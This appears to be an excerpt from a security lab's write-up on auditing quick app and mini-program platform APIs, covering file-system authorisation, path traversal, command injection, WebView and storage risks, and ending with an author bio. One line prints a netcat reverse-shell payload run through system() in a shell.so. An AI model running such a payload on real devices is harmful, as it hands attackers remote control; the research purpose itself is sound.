1) 传感器或硬件调用类:电量、蓝牙、NFC、屏幕、键盘、加速计、罗盘等
授权,快应用/小程序需要获得用户授权才能调用接口读写文件系统;
可操作文件系统范围,快应用/小程序可操作的根目录是否被限制在私有目录下的一个具体目录内;
接口是否判断了目录穿越符号../,下载文件接口或解压接口能否穿越目录跳出可操作文件系统范围;
接口在底层可能调用了C++函数或系统函数,是否能够注入恶意字符串执行命令或删除不可期的目录文件。
3) 平台特色:实名认证、广告、应用下载、卡券、红包、账号体系、支付等
接口能否在后台持续运行,比如录音,拍照;
WebView能否打开任意URL,并携带身份信息字段;
应用跳转范围是否可控,支持哪些协议;
数据存储的位置是否安全,其他快应用/小程序或者原生应用能否篡改;
access(object)
appendFile(object)
mkdir(object)
readFile(object)
rename(object)
readdir(object)
...
shell.so 执行 => system("/system/bin/toybox nc 192.168.1.153 1233 | /system/bin/sh &");
作者简介
Zhiyang OPPO子午安全实验室网络安全工程师
OPPO子午安全实验室成立于2019年,以“保护用户的安全与隐私,为品牌注入安全基因”为使命,持续关注业务安全、红蓝对抗、AIoT安全、Android安全、数据和隐私保护等领域,深耕安全攻防研究及研发体系安全建设。